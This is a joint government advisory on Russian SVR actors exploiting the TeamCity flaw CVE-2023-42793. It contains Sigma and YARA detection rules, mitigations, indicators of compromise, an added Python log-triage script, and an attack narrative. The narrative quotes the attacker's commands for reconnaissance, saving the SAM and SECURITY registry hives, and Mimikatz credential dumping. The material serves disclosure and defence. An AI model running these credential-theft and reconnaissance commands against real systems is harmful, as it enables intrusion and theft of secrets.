date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'whoami.exe'
    CommandLine|contains:
      - 'priv'
      - 'PRIV'
  condition: selection
falsepositives: legitimate use by system administrator
title: DC listing via nltest
description: Detects nltest.exe execution and DC listing
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'nltest.exe'
    CommandLine|re: '.*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*'
  condition: selection
falsepositives: legitimate use by system administrator
title: DLL execution via WMI
description: Detects DLL execution via WMI
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'WMIC.exe'
    CommandLine|contains|all:
      - 'call'
      - 'rundll32'
  condition: selection
falsepositives: legitimate use by software or system administrator
title: Process with connect and pass as args
description: Process with connect and pass as args
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CommandLine|contains|all:
      - 'pass'
      - 'connect'
  condition: selection
falsepositives: legitimate use of rsockstun or software with exact same arguments
title: Service or Driver enumeration via powershell
description: Service or Driver enumeration via powershell
author:
references:
date: 2023/11/15
logsource:
  category: ps_script
  product: windows
detection:
  selection_1:
    ScriptBlockText|contains|all:
      - 'Get-WmiObject'
      - '-Class'
      - 'Win32_Service'
  selection_2:
    ScriptBlockText|contains|all:
      - 'Get-WindowsDriver'
      - '-Online'
      - '-All'
  condition: selection_1 or selection_2
falsepositives: legitimate use by system administrator
title: Compressing files from temp to temp
description: Compressing files from temp\ to temp used by SVR to prepare data to be exfiltrated
references:
author:
date: 2023/11/15
logsource:
  category: ps_script
  product: windows
detection:
  selection:
    ScriptBlockText|re: '.*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*'
  condition: selection
title: DLL names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific DLL names.
references:
author:
date: 2023/11/15
logsource:
  category: image_load
  product: windows
detection:
  selection:
    ImageLoaded|endswith:
      - 'AclNumsInvertHost.dll'
      - 'ModeBitmapNumericAnimate.dll'
      - 'UnregisterAncestorAppendAuto.dll'
      - 'DeregisterSeekUsers.dll'
      - 'ScrollbarHandleGet.dll'
      - 'PerformanceCaptionApi.dll'
      - 'WowIcmpRemoveReg.dll'
      - 'BlendMonitorStringBuild.dll'
      - 'HandleFrequencyAll.dll'
      - 'HardSwapColor.dll'
      - 'LengthInMemoryActivate.dll'
      - 'ParametersNamesPopup.dll'
      - 'ModeFolderSignMove.dll'
      - 'ChildPaletteConnected.dll'
      - 'AddressResourcesSpec.dll'
  condition: selection
title: Sensitive registry entries saved to file
description: Sensitive registry entries saved to file
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection_base:
    Image|endswith:
      - 'reg.exe'
    CommandLine|contains: 'save'
    CommandLine|re: '.*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*'
  selection_file:
    CommandLine|re: '.*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*'
  condition: selection_base and selection_file
title: Scheduled task names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
  category: taskscheduler
  product: windows
detection:
  selection:
    EventID:
      - 4698
      - 4699
      - 4702
    TaskName:
      - '\Microsoft\Windows\IISUpdateService'
      - '\Microsoft\Windows\WindowsDefenderService'
      - '\Microsoft\Windows\WindowsDefenderService2'
      - '\Microsoft\DefenderService'
      - '\Microsoft\Windows\DefenderUPDService'
      - '\Microsoft\Windows\WiMSDFS'
      - '\Microsoft\Windows\Application Experience\StartupAppTaskCkeck'
      - '\Microsoft\Windows\Windows Error Reporting\SubmitReporting'
      - '\Microsoft\Windows\Windows Defender\Defender Update Service'
      - '\WindowUpdate'
      - '\Microsoft\Windows\Windows Error Reporting\CheckReporting'
      - '\Microsoft\Windows\Application Experience\StartupAppTaskCheck'
      - '\Microsoft\Windows\Speech\SpeechModelInstallTask'
      - '\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart'
      - '\Microsoft\Windows\Data Integrity Scan\Data Integrity Update'
      - '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
      - '\Microsoft\Windows\ATPUpd'
      - '\Microsoft\Windows\Windows Defender\Service Update'
      - '\Microsoft\Windows\WindowsUpdate\Scheduled Check'
      - '\Defender'
      - '\defender'
      - '\\Microsoft\\Windows\\IISUpdateService'
      - '\\Microsoft\\Windows\\WindowsDefenderService'
      - '\\Microsoft\\Windows\\WindowsDefenderService2'
      - '\\Microsoft\\DefenderService'
      - '\\Microsoft\\Windows\\DefenderUPDService'
      - '\\Microsoft\\Windows\\WiMSDFS'
      - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'
      - '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'
      - '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'
      - '\\WindowUpdate'
      - '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'
      - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'
      - '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'
      - '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'
      - '\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update'
      - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
      - '\\Microsoft\\Windows\\ATPUpd'
      - '\\Microsoft\\Windows\\Windows Defender\\Service Update'
      - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'
      - '\\Defender'
      - '\\defender'
  condition: selection
title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'schtasks.exe'
    CommandLine|contains:
      - 'IISUpdateService'
      - 'WindowsDefenderService'
      - 'WindowsDefenderService2'
      - 'DefenderService'
      - 'DefenderUPDService'
      - 'WiMSDFS'
      - 'StartupAppTaskCkeck'
      - 'SubmitReporting'
      - 'Defender Update Service'
      - 'WindowUpdate'
      - 'CheckReporting'
      - 'StartupAppTaskCheck'
      - 'SpeechModelInstallTask'
      - 'BfeOnServiceStart'
      - 'Data Integrity Update'
      - 'Scheduled AutoCheck'
      - 'ATPUpd'
      - 'Service Update'
      - 'Scheduled Check'
      - 'Scheduled AutoCheck'
      - 'Defender'
      - 'defender'
  selection_re:
    Image|endswith:
      - 'schtasks.exe'
    CommandLine|re:
      - '.*Defender\sUpdate\sService.*'
      - '.*Data\sIntegrity\sUpdate.*'
      - '.*Scheduled\sAutoCheck.*'
      - '.*Service\sUpdate.*'
      - '.*Scheduled\sCheck.*'
      - '.*Scheduled\sAutoCheck.*'
  condition: selection or selection_re
title: Suspicious registry modifications
description: Suspicious registry modifications
author:
references:
date: 2023/11/15
logsource:
  category: registry_set
  product: windows
detection:
  selection:
    EventID: 4657
    TargetObject|contains:
      - 'CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'
      - 'CurrentControlSet\\Control\\Lsa\\NoLMHash'
  condition: selection
title: Registry modification from cmd
description: Registry modification from cmd
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'reg.exe'
    CommandLine|contains|all:
      - 'CurrentControlSet'
      - 'Lsa'
    CommandLine|contains:
      - 'DisableRestrictedAdmin'
      - 'NoLMHash'
  condition: selection
title: Malicious Driver Load
description: Detects the load of known malicious drivers via their names or hash.
references:
  - https://github.com/wavestone-cdt/EDRSandblast#edr-drivers-and-processes-detection
author:
date: 2023/11/15
logsource:
  category: driver_load
  product: windows
detection:
  selection_name:
    ImageLoaded|endswith:
      - 'RTCore64.sys'
      - 'DBUtils_2_3.sys'
  selection_hash:
    Hashes|contains:
      - '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd'
      - '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5'
  condition: selection_name or selection_hash
YARA rules
The following rule detects most known GraphicalProton variants.
rule APT29_GraphicalProton {
    strings:
        // C1 E9 1B                shr ecx, 1Bh
        // 48 8B 44 24 08          mov rax, [rsp+30h+var_28]
        // 8B 50 04                mov edx, [rax+4]
        // C1 E2 05                shl edx, 5
        // 09 D1                   or ecx, edx
        // 48 8B 44 24 08          mov rax, [rsp+30h+var_28]
        $op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 | 08 | 10 | 0d | 07) 09 ?? 48 }
        // 48 05 20 00 00 00       add rax, 20h ; ' '
        // 48 89 C1                mov rcx, rax
        // 48 8D 15 0A A6 0D 00    lea rdx, unk_14011E546
        // 41 B8 30 00 00 00       mov r8d, 30h ; '0'
        // E8 69 B5 FE FF          call sub_14002F4B0
        // 48 8B 44 24 30          mov rax, [rsp+88h+var_58]
        // 48 05 40 00 00 00       add rax, 40h ; '@'
        // 48 89 C1                mov rcx, rax
        // 48 8D 15 1B A6 0D 00    lea rdx, unk_14011E577
        // 41 B8 70 01 00 00       mov r8d, 170h
        // E8 49 B5 FE FF          call sub_14002F4B0
        // 48 8B 44 24 30          mov rax, [rsp+88h+var_58]
        // 48 05 60 00 00 00       add rax, 60h ; '`'
        // 48 89 C1                mov rcx, rax
        // 48 8D 15 6C A7 0D 00    lea rdx, unk_14011E6E8
        // 41 B8 2F 00 00 00       mov r8d, 2Fh ; '/'
        // E8 29 B5 FE FF          call sub_14002F4B0
        // 48 8B 44 24 30          mov rax, [rsp+88h+var_58]
        // 48 05 80 00 00 00       add rax, 80h
        // 48 89 C1                mov rcx, rax
        // 48 8D 15 7C A7 0D 00    lea rdx, unk_14011E718
        // 41 B8 2F 00 00 00       mov r8d, 2Fh ; '/'
        // E8 09 B5 FE FF          call sub_14002F4B0
        // 48 8B 44 24 30          mov rax, [rsp+88h+var_58]
        // 48 05 A0 00 00 00       add rax, 0A0h
        $op_decrypt_config = {
            48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 A0 00 00 00
        }
    condition:
        all of them
}
Note: These rules are meant for threat hunting and have not been tested on a larger dataset.
MITIGATIONS
The FBI, CISA, NSA, SKW, CERT Polska, and NCSC assess that the scope and indiscriminate targeting of this campaign pose a threat to public safety and recommend organizations implement the mitigations below to improve their organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Apply available patches for CVE-2023-42793 issued by JetBrains TeamCity in mid-September 2023, if not already completed.
Monitor the network for evidence of encoded commands and execution of network scanning tools.
Ensure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
Require use of multi-factor authentication [CPG 1.3] for all services to the extent possible, particularly for email, virtual private networks, and accounts that access critical systems.
Organizations should adopt multi-factor authentication (MFA) as an additional layer of security for all users with access to sensitive data. Enabling MFA significantly reduces the risk of unauthorized access, even if passwords are compromised.
Keep all operating systems, software, and firmware up to date. Immediately configure newly added systems on the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate them into enterprise monitoring tools.
Audit log files to identify attempts to access privileged certificates and creation of fake identity providers.
Deploy software to identify suspicious behavior on systems.
Deploy endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
Use available public resources to identify credential abuse with cloud environments.
Configure authentication mechanisms to confirm certain user activities on systems, including registering new devices.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see previous tables).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
REFERENCES
FBI, DHS, CISA, Joint Cyber Security Advisory, Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders
NSA, CISA, FBI, Joint Cyber Security Advisory, Russian SVR Targets U.S. and Allied Networks
CISA, Remediating Networks Affected by the Solarwinds and Active Directory/M365 Compromise
CISA, Alert (AA21-008A), Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments
CISA, Alert (AA20-352A), Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
CISA, CISA Insights, What Every Leader Needs to Know About the Ongoing APT Cyber Activity
FBI, CISA, Joint Cybersecurity Advisory, Advanced Persistent Threat Actors Targeting U.S. Think Tanks
CISA, Malicious Activity Targeting COVID-19 Research, Vaccine Development
NCSC, CSE, NSA, CISA, Advisory: APT 29 Targets COVID-19 Vaccine Development
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, SKW, CERT Polska, and NCSC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, NSA, SKW, CERT Polska, and NCSC.
VERSION HISTORY
December 12, 2023: Initial version.
APPENDIX A – INDICATORS OF COMPROMISE CVE-2023-42793
On a Windows system, the log file C:\TeamCity\logs\teamcity-server.log will contain a log message when an attacker modifies the internal.properties file. There will also be a log message for every process created via the /app/rest/debug/processes endpoint. In addition to showing the command line used, it also shows the user ID of the user account whose authentication token was used during the attack. For example:
[2023-09-26 11:53:46,970] INFO - ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
[2023-09-26 11:53:46,970] INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"
[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"
An attacker may attempt to cover their tracks by wiping this log file. It does not appear that TeamCity logs individual HTTP requests, but if TeamCity is configured to sit behind an HTTP proxy, the HTTP proxy may have suitable logs showing the following target endpoints being accessed:
/app/rest/users/id:1/tokens/RPC2 – This endpoint is required to exploit the vulnerability.
/app/rest/users – This endpoint is only required if the attacker wishes to create an arbitrary user.
/app/rest/debug/processes – This endpoint is only required if the attacker wishes to create an arbitrary process.
Note: The user ID value may be higher than 1.
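The two log sources described above, teamcity-server.log and the access log of a proxy in front of TeamCity, can be triaged with a few regular expressions. The following is an added example, not code from the advisory or from JetBrains; it assumes the teamcity-server.log line layout shown above and an Apache/nginx-style access log format for the proxy, and its input is the three quoted log lines plus constructed benign and proxy lines.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Added example (not the advisory's own code): triage helpers for the two log
# sources Appendix A describes. The log formats below are assumptions.

# teamcity-server.log line layout: "[timestamp] LEVEL - logger - message"
LINE_RE = re.compile(r'^\[(?P<ts>[^\]]+)\]\s+(?P<level>\w+)\s+-\s+(?P<logger>\S+)\s+-\s+(?P<msg>.*)$')
USER_RE = re.compile(r'user with id=(?P<uid>\d+)')
PROC_RE = re.compile(r'External process is launched by user .*?id=(?P<uid>\d+)\. Command line: (?P<cmd>.*)$')
# The three REST endpoints Appendix A lists; the user id is not always 1.
ENDPOINT_RE = re.compile(r'/app/rest/(?:users/id:\d+/tokens/RPC2|users\b|debug/processes)')
# Assumed access-log request field: "METHOD /path HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


@dataclass
class Finding:
    kind: str           # "internal_properties_modified" or "external_process"
    timestamp: str
    user_id: Optional[int]
    detail: str         # raw message, or the launched command line


def scan_teamcity_log(lines: List[str]) -> List[Finding]:
    """Flag the two events Appendix A calls out: edits to internal.properties
    (TeamCity logs each edit twice, via two loggers) and processes launched
    through /app/rest/debug/processes."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        msg = m.group("msg")
        if "internal.properties" in msg and ("File edited" in msg or "was modified" in msg):
            u = USER_RE.search(msg)
            findings.append(Finding("internal_properties_modified", m.group("ts"),
                                    int(u.group("uid")) if u else None, msg))
        p = PROC_RE.search(msg)
        if p:
            findings.append(Finding("external_process", m.group("ts"),
                                    int(p.group("uid")), p.group("cmd")))
    return findings


def scan_proxy_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (method, endpoint) for proxy requests that reach one of the
    endpoints used in exploitation; everything else is ignored."""
    hits = []
    for line in lines:
        req = REQUEST_RE.search(line)
        if not req:
            continue
        e = ENDPOINT_RE.search(req.group("path"))
        if e:
            hits.append((req.group("method"), e.group(0)))
    return hits


# Sample input: one constructed benign line, then the three lines quoted in Appendix A.
TEAMCITY_LOG = [
    r'[2023-09-26 11:52:10,001] INFO - jetbrains.buildServer.SERVER - Starting build 1234',
    r'[2023-09-26 11:53:46,970] INFO - ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1',
    r'[2023-09-26 11:53:46,970] INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"',
    r'[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"',
]

# Constructed proxy access-log lines (documentation IP ranges, no real traffic).
PROXY_LOG = [
    '203.0.113.5 - - [26/Sep/2023:11:53:40 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 312',
    '198.51.100.7 - - [26/Sep/2023:11:53:50 +0000] "GET /app/rest/builds?locator=running:true HTTP/1.1" 200 1024',
    '203.0.113.5 - - [26/Sep/2023:11:53:58 +0000] "POST /app/rest/debug/processes HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    for f in scan_teamcity_log(TEAMCITY_LOG):
        print(f)
    for method, endpoint in scan_proxy_log(PROXY_LOG):
        print(method, endpoint)
```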
APPENDIX B – IOCS
File IoCs
GraphicalProton backdoor:
GraphicalProton HTTPS backdoor:
Backdoored vcperf:
D724728344FCF3812A0664A80270F7B4980B82342449A8C5A2FA510E10600443
Backdoored Zabbix installation archive:
4EE70128C70D646C5C2A9A17AD05949CB1FBF1043E9D671998812B2DCE75CF0F
Backdoored Webroot AV installation archive:
950ADBAF66AB214DE837E6F1C00921C501746616A882EA8C42F1BAD5F9B6EFF4
Modified rsockstun:
CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
Network IoCs
Tunnel Endpoints
65.20.97[.]203
65.21.51[.]58
Exploitation Server
103.76.128[.]34
GraphicalProton HTTPS C2 URL:
hxxps://matclick[.]com/wp-query[.]php
Download the PDF version of this report: AA23-347A Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally (PDF, 774.65 KB).
For a downloadable copy of IOCs, see: AA23-347A STIX XML (XML, 76.99 KB) and AA23-347A STIX JSON (JSON, 69.29 KB).
THREAT OVERVIEW
SVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations.
A decade ago, public reports about SVR cyber activity focused largely on the SVR’s spear phishing operations, targeting government agencies, think tanks and policy analysis organizations, educational institutions, and political organizations. This category of targeting is consistent with the SVR’s responsibility to collect political intelligence, the collection of which has long been the SVR’s highest priority. For the Russian Government, political intelligence includes not only the development and execution of foreign policies, but also the development and execution of domestic policies and the political processes that drive them. In December 2016, the U.S. Government published a Joint Analysis Report titled “GRIZZLY STEPPE – Russian Malicious Cyber Activity,” which describes the SVR’s compromise of a U.S. political party leading up to a presidential election. The SVR’s use of spear phishing operations is visible today in its ongoing Diplomatic Orbiter campaign, primarily targeting diplomatic agencies. In 2023, SKW and CERT.PL published a Joint Analysis Report describing tools and techniques used by the SVR to target embassies in dozens of countries.
Less frequently, reporting on SVR cyber activity has addressed other aspects of the SVR’s foreign intelligence collection mission. In July 2020, the U.S., U.K., and Canadian Governments jointly published an advisory revealing the SVR’s exploitation of CVEs to gain initial access to networks, and its deployment of custom malware known as WellMess, WellMail, and Sorefang to target organizations involved in COVID-19 vaccine development. Although the 2020 advisory did not mention it, the authoring agencies can now disclose that the SVR’s WellMess campaign also targeted energy companies. Such biomedical and energy targets are consistent with the SVR’s responsibility to support the Russian economy by pursuing two categories of foreign intelligence known as economic intelligence and science and technology.
In April 2021, the U.S. Government attributed a supply chain operation targeting the SolarWinds information technology company and its customers to the SVR. This attribution marked the discovery that the SVR had, since at least 2018, expanded the range of its cyber operations to include the widespread targeting of information technology companies. At least some of this targeting was aimed at enabling additional cyber operations. Following this attribution, the U.S. and U.K. Governments published advisories highlighting additional SVR TTPs, including its exploitation of various CVEs, the SVR’s use of “low and slow” password spraying techniques to gain initial access to some victims’ networks, use of a zero-day exploit, and exploitation of Microsoft 365 cloud environments.
In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023-42793 in TeamCity, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software developers to access customer networks and is likely still in the preparatory phase of its operation, having access to these companies’ networks presents the SVR with opportunities to enable hard-to-detect command and control (C2) infrastructure.
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. While the SVR followed a similar playbook in each compromise, it also adjusted to each operating environment, and not all of the steps or actions presented below were executed on every host.
Initial Access - Exploitation
The SVR started to exploit Internet-connected JetBrains TeamCity servers [T1190] in late September 2023 using CVE-2023-42793, an insecure handling of specific paths that allows authorization to be bypassed, resulting in arbitrary code execution on the server. The authoring agencies' observations show that the TeamCity exploitation usually resulted in code execution [T1203] with high privileges, granting the SVR an advantageous foothold in the network environment. The authoring agencies are not currently aware of any other initial access vector to JetBrains TeamCity being exploited by the SVR.
Host Reconnaissance
Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033],[T1059.003],[T1592.002]:
whoami /priv
whoami /all
whoami /groups
whoami /domain
nltest -dclist
nltest -dsgetdc
tasklist
netstat
wmic /node:"" /user:"" /password:"" process list brief
wmic /node:"" process list brief
wmic process get commandline -all
wmic process get commandline
wmic process where name="GoogleCrashHandler64.exe" get commandline,processed
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties.memberof
powershell Get-WmiObject -Class Win32_Service -Computername
powershell Get-WindowsDriver -Online -All
File Exfiltration
Additionally, the authoring agencies have observed the SVR exfiltrating files [T1041] which may provide insight into the host system’s operating system:
C:\Windows\system32\ntoskrnl.exe, to precisely identify the system version, likely as a prerequisite for deploying EDRSandBlast.
SQL Server executable files – based on the review of the post-exploitation actions, the SVR showed an interest in specific files of the SQL Server installation on the compromised systems:
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\secforwarder.dll
Visual Studio files – based on the review of the post-exploitation actions, the SVR showed an interest in specific Visual Studio files:
C:\Program Files (x86)\Microsoft Visual Studio\2017\SQL\Common7\IDE\VSIXAutoUpdate.exe
Update management agent files – based on the review of the post-exploitation actions, the SVR showed an interest in the executables and configuration of patch management software:
C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd\bin\httpd.exe
C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd
C:\ProgramData\GFI\LanGuard 12\HttpdConfig\httpd.conf
Interest in SQL Server
Based on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001],[T1505.001]:
powershell Compress-Archive -Path "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll" -DestinationPath C:\Windows\temp\1\sql.zip
SVR cyber actors also exfiltrated secforwarder.dll.
Tactics Used to Avoid Detection
To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001].
This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove Protected Process Light (PPL) protection, which controls running processes and protects them from being tampered with or infected. For a small subset of victims, the actors then injected code into AV/EDR processes [T1068]. Additionally, executables that are likely to be detected (e.g., Mimikatz) were executed in memory [T1003.001].
In several cases the SVR attempted to hide its backdoors by:
Abusing a DLL hijacking vulnerability in Zabbix software by replacing a legitimate Zabbix DLL with one containing the GraphicalProton backdoor,
Backdooring an open source application developed by Microsoft named vcperf. The SVR modified and copied the publicly available source code. After execution, the backdoored vcperf dropped several DLLs to disk, one of them being a GraphicalProton backdoor,
Abusing a DLL hijacking vulnerability in Webroot antivirus software by replacing a legitimate DLL with one containing the GraphicalProton backdoor.
To avoid detection by network monitoring, the SVR devised a covert C2 channel that used Microsoft OneDrive and Dropbox cloud services. To further enable obfuscation, data exchanged with malware via OneDrive and Dropbox were hidden inside randomly generated BMP files [T1564], illustrated below:
Privilege Escalation
To facilitate privilege escalation [T1098], the SVR used multiple techniques, including WinPEAS, NoLMHash registry key modification, and the Mimikatz tool.
The SVR modified the NoLMHash registry using the following reg command:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d "0" /f
The SVR used the following Mimikatz commands [T1003]:
privilege::debug
lsadump::cache
lsadump::secrets
lsadump::sam
sekurlsa::logonpasswords
Persistence
The SVR relied on scheduled tasks [T1053.005] to secure persistent execution of backdoors. Depending on the privileges the SVR had, its executables were stored in one of the following directories:
C:\Windows\temp
C:\Windows\System32
C:\Windows\WinStore
The SVR made all modifications using the schtasks.exe binary. Multiple variants of the arguments passed to schtasks.exe were observed; these can be found in Appendix B – Indicators of Compromise.
To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs) [T1558.001].
Sensitive Data Exfiltration [T1020]
The SVR exfiltrated the following Windows Registry hives from its victims [T1003]:
HKLM\SYSTEM
HKLM\SAM
HKLM\SECURITY
In order to exfiltrate the Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. It used “reg save” to save the SYSTEM, SAM and SECURITY registry hives, and used PowerShell to stage .zip archives in the C:\Windows\Temp\ directory.
reg save HKLM\SYSTEM "C:\Windows\temp\1\sy.sa" /y
reg save HKLM\SAM "C:\Windows\temp\1\sam.sa" /y
reg save HKLM\SECURITY "C:\Windows\temp\1\se.sa" /y
powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q
In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.
The SVR also used the open source DSInternals tool to interact with Directory Services; DSInternals can be used to obtain sensitive domain information.
Network Reconnaissance
